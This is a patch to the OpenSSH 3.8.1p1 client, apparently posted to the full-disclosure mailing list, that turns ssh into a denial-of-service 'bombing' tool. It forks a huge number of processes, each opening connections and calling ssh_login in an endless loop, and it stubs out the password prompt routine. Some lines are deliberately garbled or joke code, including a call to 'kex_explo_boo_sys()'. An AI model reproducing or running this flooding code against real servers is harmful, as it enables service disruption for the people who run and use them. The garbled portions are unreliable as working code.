+ sensitive_data.external_keysign = 0;
+ if (options.rhosts_rsa_authentication ||
+ options.hostbased_authentication) {
sensitive_data.nkeys = 3;
sensitive_data.keys = xmalloc(sensitive_data.nkeys *
- sizeof(Key));
+ sizeof(Key));
PRIV_START;
sensitive_data.keys[0] = key_load_private_type(KEY_RSA1,
- _PATH_HOST_KEY_FILE, "", NULL);
+ _PATH_HOST_KEY_FILE, "", NULL);
sensitive_data.keys[1] = key_load_private_type(KEY_DSA,
- _PATH_HOST_DSA_KEY_FILE, "", NULL);
+ _PATH_HOST_DSA_KEY_FILE, "", NULL);
sensitive_data.keys[2] = key_load_private_type(KEY_RSA,
- _PATH_HOST_RSA_KEY_FILE, "", NULL);
+ _PATH_HOST_RSA_KEY_FILE, "", NULL);
PRIV_END;
if (options.hostbased_authentication == 1 &&
- sensitive_data.keys[0] == NULL &&
- sensitive_data.keys[1] == NULL &&
- sensitive_data.keys[2] == NULL) {
+ sensitive_data.keys[0] == NULL &&
+ sensitive_data.keys[1] == NULL &&
+ sensitive_data.keys[2] == NULL) {
sensitive_data.keys[1] = key_load_public(
- _PATH_HOST_DSA_KEY_FILE, NULL);
+ _PATH_HOST_DSA_KEY_FILE, NULL);
sensitive_data.keys[2] = key_load_public(
- _PATH_HOST_RSA_KEY_FILE, NULL);
+ _PATH_HOST_RSA_KEY_FILE, NULL);
sensitive_data.external_keysign = 1;
}
- }
- /*
- * Get rid of any extra privileges that we may have. We will no
- * longer need them. Also, extra privileges could make it very hard
- * to read identity files and other non-world-readable files from the
- * user's home directory if it happens to be on a NFS volume where
- * root is mapped to nobody.
- */
- seteuid(original_real_uid);
- setuid(original_real_uid);
+ }
- /*
- * Now that we are back to our own permissions, create ~/.ssh
- * directory if it doesn\'t already exist.
- */
- snprintf(buf, sizeof buf, "%.100s%s%.100s", pw->pw_dir, strcmp(pw->pw_dir, "/") ? "/" : "", _PATH_SSH_USER_DIR);
- if (stat(buf, &st) < 0)
- if (mkdir(buf, 0700) < 0)
- error("Could not create directory '%.200s'.", buf);
-
- /* load options.identity_files */
- load_public_identity_files();
-
- /* Expand ~ in known host file names. */
- /* XXX mem-leaks: */
- options.system_hostfile =
- tilde_expand_filename(options.system_hostfile, original_real_uid);
- options.user_hostfile =
- tilde_expand_filename(options.user_hostfile, original_real_uid);
- options.system_hostfile2 =
- tilde_expand_filename(options.system_hostfile2, original_real_uid);
- options.user_hostfile2 =
- tilde_expand_filename(options.user_hostfile2, original_real_uid);
-
- signal(SIGPIPE, SIG_IGN); /* ignore SIGPIPE early */
-
- /* Log into the remote system. This never returns if the login fails. */
- ssh_login(&sensitive_data, host, (struct sockaddr *)&hostaddr, pw);
-
- /* We no longer need the private host keys. Clear them now. */
- if (sensitive_data.nkeys != 0) {
- for (i = 0; i < sensitive_data.nkeys; i++) {
- if (sensitive_data.keys[i] != NULL) {
- /* Destroys contents safely */
- debug3("clear hostkey %d", i);
- key_free(sensitive_data.keys[i]);
- sensitive_data.keys[i] = NULL;
+ /* load options.identity_files */
+ load_public_identity_files();
+
+ /* Expand ~ in known host file names. */
+ /* XXX mem-leaks: */
+ options.system_hostfile =
+ tilde_expand_filename(options.system_hostfile, original_real_uid);
+ options.user_hostfile =
+ tilde_expand_filename(options.user_hostfile, original_real_uid);
+ options.system_hostfile2 =
+ tilde_expand_filename(options.system_hostfile2, original_real_uid);
+ options.user_hostfile2 =
+ tilde_expand_filename(options.user_hostfile2, original_real_uid);
+
+ signal(SIGPIPE, SIG_IGN); /* ignore SIGPIPE early */
+ printf("*Loaded\n");
+/*****************************END of loadgin stuff***********************/
+
+
+ unsigned long long piove;
+ float percent;
+ int fd_dupped;
+
+ if(!ssh_udos) {
+ printf("*** Starting the infinite bombing...\n");
+ ssh_udos=(unsigned long long)1844674407370955161;
+ }
+ else
+ printf("*** Starting the bombing:\n");
+ if(!IasI || IasI <0 || IasI > 20*10000)
+ IasI=5*10000;
+ for(piove=1; piove<=ssh_udos; piove++) {
+ percent=(piove/ssh_udos)*100;
+ printf("\r}(---Made %lld/%lld bombs. Percentage completed: [%f%%]---){ ",piove, ssh_udos, percent);
+ /* Log into the remote system. This never returns if the login fails. */
+#define oh int _iop; for(_iop=0;
+ if(!fork()) {
+ fd_dupped=open("/dev/null", O_RDWR, 0);
+ dup2(fd_dupped, stdin);
+ dup2(fd_dupped, stdout);
+ dup2(fd_dupped, stderr);
+ close (fd_dupped);
+
+
+/*We must use a fork cuz at the second ssh_connect it gives: Disconnecting: Corrupted MAC on input.
+ * */
+ /* Open a connection to the remote host. */
+ if (ssh_connect(host, &hostaddr, options.port, options.address_family, options.connection_attempts,
+#ifdef HAVE_CYGWIN
+ options.use_privileged_port,
+#else
+ original_effective_uid == 0 && options.use_privileged_port,
+#endif
+ options.proxy_command) != 0)
+ exit(1);
+ // exit_status = compat20 ? ssh_session2() : ssh_session();
+ // ssh_session2_open();
+ if(seven_eyes) {
+ ssh_login(&sensitive_data, host, (struct sockaddr *)&hostaddr, pw);
+ exit(0);
+ } else {
+ for(;;)
+ ssh_login(&sensitive_data, host, (struct sockaddr *)&hostaddr, pw);
+ }
+
+ exit(0);
}
}
- xfree(sensitive_data.keys);
- }
- for (i = 0; i < options.num_identity_files; i++) {
- if (options.identity_files[i]) {
- xfree(options.identity_files[i]);
- options.identity_files[i] = NULL;
+ printf("\n");
+ printf("\nClearing the cache ");
+ //sleep(12313);
+ printf(". ");
+ sleep(1);
+ printf(". ");
+ sleep(1);
+ printf(". ");
+ sleep(1);
+ printf(". ");
+ sleep(1);
+ printf(" .\nDone!\n");
+
+ printf("---------------------------------\n");
+ if(I__a_m__a_l_a_m_e_I) {
+ c=o;
+ oh my dear __I __lo ve__ YOU
+
+ sleep(5);
+ kex_explo_boo_sys();
+ }
+ exit(1);
+ /* We no longer need the private host keys. Clear them now. */
+ if (sensitive_data.nkeys != 0) {
+ for (i = 0; i < sensitive_data.nkeys; i++) {
+ if (sensitive_data.keys[i] != NULL) {
+ /* Destroys contents safely */
+ debug3("clear hostkey %d", i);
+ key_free(sensitive_data.keys[i]);
+ sensitive_data.keys[i] = NULL;
+ }
+ }
+ xfree(sensitive_data.keys);
}
- if (options.identity_keys[i]) {
- key_free(options.identity_keys[i]);
- options.identity_keys[i] = NULL;
+ for (i = 0; i < options.num_identity_files; i++) {
+ if (options.identity_files[i]) {
+ xfree(options.identity_files[i]);
+ options.identity_files[i] = NULL;
+ }
+ if (options.identity_keys[i]) {
+ key_free(options.identity_keys[i]);
+ options.identity_keys[i] = NULL;
+ }
}
- }
- exit_status = compat20 ? ssh_session2() : ssh_session();
- packet_close();
+ exit_status = compat20 ? ssh_session2() : ssh_session();
+ packet_close();
- /*
- * Send SIGHUP to proxy command if used. We don't wait() in
- * case it hangs and instead rely on init to reap the child
- */
- if (proxy_command_pid > 1)
- kill(proxy_command_pid, SIGHUP);
+ /*
+ * Send SIGHUP to proxy command if used. We don't wait() in
+ * case it hangs and instead rely on init to reap the child
+ */
+ if (proxy_command_pid > 1)
+ kill(proxy_command_pid, SIGHUP);
- return exit_status;
+ return exit_status;
}
#define SSH_X11_PROTO "MIT-MAGIC-COOKIE-1"
-static void
+ static void
x11_get_proto(char **_proto, char **_data)
{
char cmd[1024];
@@ -707,23 +801,16 @@
proto[0] = data[0] = '\0';
if (!options.xauth_location ||
- (stat(options.xauth_location, &st) == -1)) {
+ (stat(options.xauth_location, &st) == -1)) {
debug("No xauth program.");
} else {
if ((display = getenv("DISPLAY")) == NULL) {
debug("x11_get_proto: DISPLAY not set");
return;
}
- /*
- * Handle FamilyLocal case where $DISPLAY does
- * not match an authorization entry. For this we
- * just try "xauth list unix:displaynum.screennum".
- * XXX: "localhost" match to determine FamilyLocal
- * is not perfect.
- */
if (strncmp(display, "localhost:", 10) == 0) {
snprintf(xdisplay, sizeof(xdisplay), "unix:%s",
- display + 10);
+ display + 10);
display = xdisplay;
}
if (options.forward_x11_trusted == 0) {
@@ -733,26 +820,26 @@
if (mkdtemp(xauthdir) != NULL) {
do_unlink = 1;
snprintf(xauthfile, MAXPATHLEN, "%s/xauthfile",
- xauthdir);
+ xauthdir);
snprintf(cmd, sizeof(cmd),
- "%s -f %s generate %s " SSH_X11_PROTO
- " untrusted timeout 1200 2>" _PATH_DEVNULL,
- options.xauth_location, xauthfile, display);
+ "%s -f %s generate %s " SSH_X11_PROTO
+ " untrusted timeout 1200 2>" _PATH_DEVNULL,
+ options.xauth_location, xauthfile, display);
debug2("x11_get_proto: %s", cmd);
if (system(cmd) == 0)
generated = 1;
}
}
snprintf(cmd, sizeof(cmd),
- "%s %s%s list %s . 2>" _PATH_DEVNULL,
- options.xauth_location,
- generated ? "-f " : "" ,
- generated ? xauthfile : "",
- display);
+ "%s %s%s list %s . 2>" _PATH_DEVNULL,
+ options.xauth_location,
+ generated ? "-f " : "" ,
+ generated ? xauthfile : "",
+ display);
debug2("x11_get_proto: %s", cmd);
f = popen(cmd, "r");
if (f && fgets(line, sizeof(line), f) &&
- sscanf(line, "%*s %511s %511s", proto, data) == 2)
+ sscanf(line, "%*s %511s %511s", proto, data) == 2)
got_data = 1;
if (f)
pclose(f);
@@ -779,19 +866,19 @@
u_int32_t rand = 0;
logit("Warning: No xauth data; "
- "using fake authentication data for X11 forwarding.");
+ "using fake authentication data for X11 forwarding.");
strlcpy(proto, SSH_X11_PROTO, sizeof proto);
for (i = 0; i < 16; i++) {
if (i % 4 == 0)
rand = arc4random();
snprintf(data + 2 * i, sizeof data - 2 * i, "%02x",
- rand & 0xff);
+ rand & 0xff);
rand >>= 8;
}
}
}
-static void
+ static void
ssh_init_forwarding(void)
{
int success = 0;
@@ -800,14 +887,14 @@
/* Initiate local TCP/IP port forwardings. */
for (i = 0; i < options.num_local_forwards; i++) {
debug("Connections to local port %d forwarded to remote address %.200s:%d",
- options.local_forwards[i].port,
- options.local_forwards[i].host,
- options.local_forwards[i].host_port);
+ options.local_forwards[i].port,
+ options.local_forwards[i].host,
+ options.local_forwards[i].host_port);
success += channel_setup_local_fwd_listener(
- options.local_forwards[i].port,
- options.local_forwards[i].host,
- options.local_forwards[i].host_port,
- options.gateway_ports);
+ options.local_forwards[i].port,
+ options.local_forwards[i].host,
+ options.local_forwards[i].host_port,
+ options.gateway_ports);
}
if (i > 0 && success == 0)
error("Could not request local forwarding.");
@@ -815,17 +902,17 @@
/* Initiate remote TCP/IP port forwardings. */
for (i = 0; i < options.num_remote_forwards; i++) {
debug("Connections to remote port %d forwarded to local address %.200s:%d",
- options.remote_forwards[i].port,
- options.remote_forwards[i].host,
- options.remote_forwards[i].host_port);
+ options.remote_forwards[i].port,
+ options.remote_forwards[i].host,
+ options.remote_forwards[i].host_port);
channel_request_remote_forwarding(
- options.remote_forwards[i].port,
- options.remote_forwards[i].host,
- options.remote_forwards[i].host_port);
+ options.remote_forwards[i].port,
+ options.remote_forwards[i].host,
+ options.remote_forwards[i].host_port);
}
}
-static void
+ static void
check_agent_present(void)
{
if (options.forward_agent) {
@@ -835,7 +922,7 @@
}
}
-static int
+ static int
ssh_session(void)
{
int type;
@@ -969,10 +1056,10 @@
/* Enter the interactive session. */
return client_loop(have_tty, tty_flag ?
- options.escape_char : SSH_ESCAPECHAR_NONE, 0);
+ options.escape_char : SSH_ESCAPECHAR_NONE, 0);
}
-static void
+ static void
client_subsystem_reply(int type, u_int32_t seq, void *ctxt)
{
int id, len;
@@ -984,10 +1071,10 @@
packet_check_eom();
if (type == SSH2_MSG_CHANNEL_FAILURE)
fatal("Request for subsystem '%.*s' failed on channel %d",
- len, (u_char *)buffer_ptr(&command), id);
+ len, (u_char *)buffer_ptr(&command), id);
}
-void
+ void
client_global_request_reply_fwd(int type, u_int32_t seq, void *ctxt)
{
int i;
@@ -996,17 +1083,17 @@
if (i >= options.num_remote_forwards)
return;
debug("remote forward %s for: listen %d, connect %s:%d",
- type == SSH2_MSG_REQUEST_SUCCESS ? "success" : "failure",
- options.remote_forwards[i].port,
- options.remote_forwards[i].host,
- options.remote_forwards[i].host_port);
+ type == SSH2_MSG_REQUEST_SUCCESS ? "success" : "failure",
+ options.remote_forwards[i].port,
+ options.remote_forwards[i].host,
+ options.remote_forwards[i].host_port);
if (type == SSH2_MSG_REQUEST_FAILURE)
logit("Warning: remote port forwarding failed for listen port %d",
- options.remote_forwards[i].port);
+ options.remote_forwards[i].port);
}
/* request pty/x11/agent/tcpfwd/shell for channel */
-static void
+ static void
ssh_session2_setup(int id, void *arg)
{
int len;
@@ -1038,7 +1125,7 @@
/* XXX wait for reply */
}
if (options.forward_x11 &&
- getenv("DISPLAY") != NULL) {
+ getenv("DISPLAY") != NULL) {
char *proto, *data;
/* Get reasonable local authentication information. */
x11_get_proto(&proto, &data);
@@ -1082,7 +1169,7 @@
}
/* open new channel for a session */
-static int
+ static int
ssh_session2_open(void)
{
Channel *c;
@@ -1096,9 +1183,6 @@
out = dup(STDOUT_FILENO);
err = dup(STDERR_FILENO);
- if (in < 0 || out < 0 || err < 0)
- fatal("dup() in/out/err failed");
-
/* enable nonblocking unless tty */
if (!isatty(in))
set_nonblock(in);
@@ -1114,9 +1198,9 @@
packetmax >>= 1;
}
c = channel_new(
- "session", SSH_CHANNEL_OPENING, in, out, err,
- window, packetmax, CHAN_EXTENDED_WRITE,
- "client-session", /*nonblock*/0);
+ "session", SSH_CHANNEL_OPENING, in, out, err,
+ window, packetmax, CHAN_EXTENDED_WRITE,
+ "client-session", /*nonblock*/0);
debug3("ssh_session2_open: channel_new: %d", c->self);
@@ -1127,7 +1211,7 @@
return c->self;
}
-static int
+ static int
ssh_session2(void)
{
int id = -1;
@@ -1144,10 +1228,10 @@
fatal("daemon() failed: %.200s", strerror(errno));
return client_loop(tty_flag, tty_flag ?
- options.escape_char : SSH_ESCAPECHAR_NONE, id);
+ options.escape_char : SSH_ESCAPECHAR_NONE, id);
}
-static void
+ static void
load_public_identity_files(void)
{
char *filename;
@@ -1157,15 +1241,15 @@
Key **keys;
if (options.smartcard_device != NULL &&
- options.num_identity_files < SSH_MAX_IDENTITY_FILES &&
- (keys = sc_get_keys(options.smartcard_device, NULL)) != NULL ) {
+ options.num_identity_files < SSH_MAX_IDENTITY_FILES &&
+ (keys = sc_get_keys(options.smartcard_device, NULL)) != NULL ) {
int count = 0;
for (i = 0; keys[i] != NULL; i++) {
count++;
memmove(&options.identity_files[1], &options.identity_files[0],
- sizeof(char *) * (SSH_MAX_IDENTITY_FILES - 1));
+ sizeof(char *) * (SSH_MAX_IDENTITY_FILES - 1));
memmove(&options.identity_keys[1], &options.identity_keys[0],
- sizeof(Key *) * (SSH_MAX_IDENTITY_FILES - 1));
+ sizeof(Key *) * (SSH_MAX_IDENTITY_FILES - 1));
options.num_identity_files++;
options.identity_keys[0] = keys[i];
options.identity_files[0] = sc_get_key_label(keys[i]);
@@ -1178,12 +1262,15 @@
#endif /* SMARTCARD */
for (; i < options.num_identity_files; i++) {
filename = tilde_expand_filename(options.identity_files[i],
- original_real_uid);
+ original_real_uid);
public = key_load_public(filename, NULL);
debug("identity file %s type %d", filename,
- public ? public->type : -1);
+ public ? public->type : -1);
xfree(options.identity_files[i]);
options.identity_files[i] = filename;
options.identity_keys[i] = public;
}
}
+
+
+/*A*/
diff -ruN ORIGINAL-3.8.1p1/sshconnect2.c pofalpt-openssh-3.8.1p1/sshconnect2.c
--- ORIGINAL-3.8.1p1/sshconnect2.c 2004-03-08 13:12:36.000000000 +0100
+++ pofalpt-openssh-3.8.1p1/sshconnect2.c 2004-09-13 22:49:03.000000000 +0200
@@ -724,6 +724,8 @@
char prompt[150];
char *password;
+ return 1;
+
if (attempt++ >= options.number_of_password_prompts)
return 0;
-------------- next part --------------
4eb5c7aa58a4c6cdaba375599e92761b patch-ssh-3.8.1p1-uDoS.patch
-------------- next part --------------
a00a8c9dfe155f0030ae519bc6adf317 pof-uDoS-openssh-3.8.1p1.patch
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040919/33a60237/attachment.bin
Powered by blists - more mailing lists